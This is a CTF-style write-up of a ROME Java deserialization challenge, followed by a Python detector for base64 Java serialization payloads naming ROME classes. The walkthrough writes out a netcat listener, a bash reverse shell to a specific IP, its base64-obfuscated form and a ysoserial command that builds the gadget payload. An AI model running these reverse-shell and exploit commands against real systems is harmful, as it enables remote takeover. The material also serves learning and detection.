# \[WEEK4]ROME

The ROME deserialization was easy to find; when building the payload I spent quite a long time struggling with the encoding.

First, start a listener on the VPS

```
nc -lvnp 7777
```

Then construct the reverse shell command

```
bash -i >& /dev/tcp/1.12.51.64/7777 0>&1
```

Base64-encode it

```
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjEyLjUxLjY0Lzc3NzcgMD4mMQ==}|{base64,-d}|{bash,-i}
```

Use ysoserial (yso)

```
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar ROME "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjEyLjUxLjY0Lzc3NzcgMD4mMQ==}|{base64,-d}|{bash,-i}" | base64
```

Remove the line breaks, URL-encode it, and send

<figure><img src="https://1298837596-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FUlxElCQcjylbSFsJycU3%2Fuploads%2FNMIq63QPaCa2YpQ08Itc%2Fimage.png?alt=media&#x26;token=8ad182e0-eac2-4edd-9793-cee4b2340d03" alt=""><figcaption></figcaption></figure>

The VPS listener receives the connection

<figure><img src="https://1298837596-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FUlxElCQcjylbSFsJycU3%2Fuploads%2FVlgVEccvUGCsEM2G3a87%2Fimage.png?alt=media&#x26;token=fd8e9c08-3e1d-4aea-8ed2-8c6c7c3272ba" alt=""><figcaption></figcaption></figure>
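From the defending side, the request sent above has a recognizable shape: a URL-encoded base64 value that decodes to a Java serialization stream naming ROME classes. The following is an added example, not part of the original writeup, that checks a parameter value for that shape. The function names and the constructed sample are assumptions; the ROME package names are those of the rome 1.0 library and its renamed rometools successor.

```python
import base64
import binascii
import re
from urllib.parse import quote, unquote

# Java serialization streams start with STREAM_MAGIC (0xACED) + STREAM_VERSION (0x0005).
JAVA_SERIAL_MAGIC = b"\xac\xed\x00\x05"
# Class names are stored as plain bytes in the stream, so ROME's
# feed.impl classes (ObjectBean, ToStringBean, EqualsBean, ...) are visible.
ROME_CLASS_RE = re.compile(
    rb"com\.(?:sun\.syndication|rometools\.rome)\.feed\.impl\.[A-Za-z]+"
)


def inspect_param(value: str) -> dict:
    """Classify one HTTP parameter value sent as URL-encoded base64."""
    result = {"java_serialized": False, "rome_classes": []}
    # Undo URL encoding, drop line breaks, and restore '+' if a form
    # decoder upstream already turned it into a space.
    raw = unquote(value).replace("\r", "").replace("\n", "").replace(" ", "+")
    try:
        blob = base64.b64decode(raw, validate=True)
    except (binascii.Error, ValueError):
        return result  # not base64 at all
    if not blob.startswith(JAVA_SERIAL_MAGIC):
        return result  # base64, but not a Java object stream
    result["java_serialized"] = True
    result["rome_classes"] = sorted(
        {m.decode() for m in ROME_CLASS_RE.findall(blob)}
    )
    return result


def constructed_sample() -> str:
    """Constructed test input: stream header plus one class descriptor name.
    It is only a fragment for the detector and cannot be deserialized."""
    name = b"com.sun.syndication.feed.impl.ObjectBean"
    stream = (JAVA_SERIAL_MAGIC + b"\x73\x72"          # TC_OBJECT, TC_CLASSDESC
              + len(name).to_bytes(2, "big") + name     # class name
              + b"\x00" * 8)                            # placeholder serialVersionUID
    return quote(base64.b64encode(stream).decode(), safe="")


if __name__ == "__main__":
    print(inspect_param(constructed_sample()))
```

Any hit on `java_serialized` for an endpoint that is not meant to accept Java objects is worth alerting on by itself; the ROME class match only narrows down which gadget library was targeted.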
